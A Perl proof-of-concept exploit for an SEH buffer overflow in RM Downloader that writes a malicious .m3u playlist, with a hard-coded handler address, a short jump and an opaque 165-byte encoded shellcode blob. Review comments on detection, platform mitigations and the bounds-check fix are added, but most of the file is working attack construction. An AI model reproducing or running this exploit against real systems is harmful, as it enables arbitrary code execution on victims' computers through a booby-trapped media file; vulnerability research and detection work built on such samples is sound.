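#!/usr/bin/perl -w
# Author: Jacky
# Version: 3.0.2.1
# Tested on: Windows XP SP2

#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
#Written by Jacky
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct
#Ret Vulnerability , so i tried by SEH and Voila !
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!

# Review notes:
#  * The script has no network or process side effects: it only writes one
#    local file, RM.m3u, in the current directory.
#  * File layout, in order: 35059 filler bytes, a 4-byte next-SEH field, a
#    4-byte handler pointer, 25 NOP bytes, a 165-byte opaque code blob and
#    5000 trailing filler bytes.
#  * Detection angle: the result is a single line of roughly 40 KB made of
#    repeated "A" bytes plus non-printable bytes, with no playlist entries --
#    unlike any legitimate .m3u file.
#  * The handler pointer is a hard-coded address and the header lists only
#    Windows XP SP2 as tested. Presumably it points into a module loaded at a
#    fixed base without SafeSEH (not verifiable from this file); SafeSEH,
#    SEHOP, ASLR and DEP are the platform mitigations for this bug class.
#  * Root cause on the application side is an unbounded copy of a playlist
#    line; the fix there is a length check before the copy.

use strict;
use warnings;

my $file="RM.m3u";

# Filler up to the exception registration record (offset found by the author).
my $junk="A"x35059;

# Next-SEH field: x86 short jump (EB 1E) padded with two NOPs.
my $nseh="\xeb\x1e\x90\x90";

my $seh="\x1F\xEA\x02\x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
#address and it worked Perfectly ;-)
#This Address works too ::> 0x01DD1111

my $nops="\x90"x25;

# Opaque encoded machine code. The page does not say what it executes, and
# this script does not decode it; it is reproduced byte-for-byte.
my $esp="\xbf\x1b\xaf\xd9\xd2\x2b\xc9\xb1\x24\xdb\xda\xd9\x74\x24\xf4\x5b".
"\x31\x7b\x0e\x83\xeb\xfc\x03\x60\xa5\x3b\x27\x6a\x51\xff\xc8\x92".
"\xa2\x8b\x8c\xae\x29\xf7\x0b\xb6\x2c\xe7\x9f\x09\x37\x7c\xc0\xb5".
"\x46\x69\xb6\x3e\x7c\xe6\x48\xae\x4c\x38\xd3\x82\x2b\x78\x90\xdd".
"\xf2\xb3\x54\xe0\x36\xa8\x93\xd9\xe2\x0b\x58\x68\xee\xdf\x3f\xb6".
"\xf1\x34\xd9\x3d\xfd\x81\xad\x1e\xe2\x14\x59\x2b\x06\x9c\x9c\xc0".
"\xbe\xfe\xba\x12\x02\xcf\x02\x7e\x0f\x70\xb3\xfb\xcf\x09\xbf\x88".
"\x90\xe5\x34\xfe\x0c\x5b\xc1\x96\x24\x48\xdf\xed\xb5\x3e\xe0\xf1".
"\xb5\xb5\x89\xcd\xea\xf8\xbf\x4d\x43\x72\xc7\x0e\xab\xff\x68\x78".
"\xdc\x8a\x8d\x27\x74\x13\x73\x5d\x8a\x74\x73\x86\xf0\x1b\xe7\x2b".
"\xd9\xbe\x8f\xce\x25";

my $junk2="A"x5000;
my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;

# Three-argument open with a lexical handle: the mode can no longer be
# smuggled in through the file name, and a failed open stops the script
# instead of falling through to a misleading success message.
open(my $out, '>', $file) or die "Cannot open $file for writing: $!\n";
print {$out} $payload or die "Cannot write to $file: $!\n";

# Buffered write errors surface at close, so report success only afterwards.
close($out) or die "Cannot close $file: $!\n";

print "[+]File Created Successfully!\n";
print "[+]Done!\n";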